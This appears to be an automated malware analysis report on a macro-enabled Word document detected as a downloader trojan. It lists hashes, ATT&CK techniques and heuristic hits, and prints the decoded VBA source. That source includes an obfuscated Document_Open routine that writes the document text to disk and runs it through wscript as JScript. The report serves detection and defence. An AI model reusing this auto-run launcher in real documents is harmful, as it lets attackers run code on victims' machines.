Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 2c05b2bd34741ad7…

MALICIOUS

Office (OOXML) / .DOCX

109.1 KB Created: 2019-07-29 05:47:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2026-06-12
MD5: 593fcc3524ee95703516cb7c9ae5ddc6 SHA-1: a469316dc233c978f60a946f3bd61b178b3c59a1 SHA-256: 2c05b2bd34741ad7a1fe033532a3644e013e988fdef9e1f1ef91987ccc11e638
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious OOXML document containing VBA macros. The macros utilize `CreateObject` and `CallByName` functions, indicative of dynamic execution. The `AutoOpen` macro, combined with `WinHttp` execution, suggests the script is designed to download and execute a second-stage payload. ClamAV detection further confirms its malicious nature as a downloader trojan.

Heuristics 7

  • ClamAV: Doc.Downloader.Trojan-f0f887070fc68787-f0f887070fc68787-9950342-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Trojan-f0f887070fc68787-f0f887070fc68787-9950342-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Debug.Print (CallByName(CreateObject(Dalore & "." & Messerrt), Dalore & Vopaso, VbMethod, Dazaxok & Dalore, "W" & Beca & " /" & Basoli & Beca & " " & Chr((69 - 1) / 2) & Terix & Chr((60 + 8) / 2), "", "", 0))
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
     Debug.Print (CallByName(CreateObject(Dalore & "." & Messerrt), Dalore & Vopaso, VbMethod, Dazaxok & Dalore, "W" & Beca & " /" & Basoli & Beca & " " & Chr((69 - 1) / 2) & Terix & Chr((60 + 8) / 2), "", "", 0))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2646 bytes
SHA-256: ed7c553573d9813f9018d0326b6ed4c83dc6164cc994f0c4874412597205ebfe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private oncetime As Boolean

Private Boris As String
Private Terix As String
Private Messerrt As String
Private Dalore As String

Public Beca As String
Public Dazaxok As String
Public Basoli As String
Public Vopaso As String


Sub AddTextAtStartOfTask()
'This macro adds text you enter at the start of the name of all selected tasks
'It is useful if you want to identify certain tasks as being part of a group for example "sprint 2".
'Based on AddMyText by Jack Dahlgren, Feb 2002
'Copyright T Morphy July 2014
Dim addtext As String
Dim UpdateTask As Task
If ActiveSelection = 0 Then
MsgBox "Select the tasks that you want to add text to"
Exit Sub
End If
addtext = "Enter text to add to the start of the task name - no leading space needed, leave blank to quit"
If addtext = "" Then Exit Sub
For Each UpdateTask In ActiveSelection.Tasks
UpdateTask.Name = addtext & " " & UpdateTask.Name
Next UpdateTask

End Sub

Private Sub ReCallMe()

 Debug.Print (CallByName(CreateObject(Dalore & "." & Messerrt), Dalore & Vopaso, VbMethod, Dazaxok & Dalore, "W" & Beca & " /" & Basoli & Beca & " " & Chr((69 - 1) / 2) & Terix & Chr((60 + 8) / 2), "", "", 0))
End Sub

Private Sub InGoPo(data As Variant)
  Dim SeemsGood As String, Dupolas As Integer
  
  Messerrt = Mid("Really coapplication", 10, 11)
  Dalore = Mid("Sheller in hole!", 1, 5)
  Beca = Mid("Delete a tyscript", 12, 6)
  
  SeemsGood = ActiveDocument.AttachedTemplate.Path & "\pp:br"
  Terix = SeemsGood
  Dupolas = FreeFile
  Open SeemsGood For Binary Lock Read Write As #Dupolas
  Put #Dupolas, , ActiveDocument.Content.Text
  
  Close #Dupolas
  
  Dazaxok = Mid("AC\DC power too", 7, 4 + 1)
  Basoli = Mid("ARE you Ae:j----", 10, 3)
  Vopaso = Mid("Huge big Teexecute them", 12, 7)
  
End Sub


Private Sub Document_Open()
If oncetime = False Then
oncetime = True
InGoPo 1
ReCallMe
End If
End Sub

Private Function Moose()
Desazom (Empty)
End Function



Attribute VB_Name = "NewMacros"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C41FD55C-D225-461C-9DB7-DCFCE0949EA2}{BD0F1918-DA46-4F3E-BDEA-DBBFD07CDA31}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 53248 bytes
SHA-256: f22cc5402b22b07574486e5b9cdcaefd9836503848eead7c43620485d9e80423

Open this report in the interactive analyzer, or submit your own file for analysis.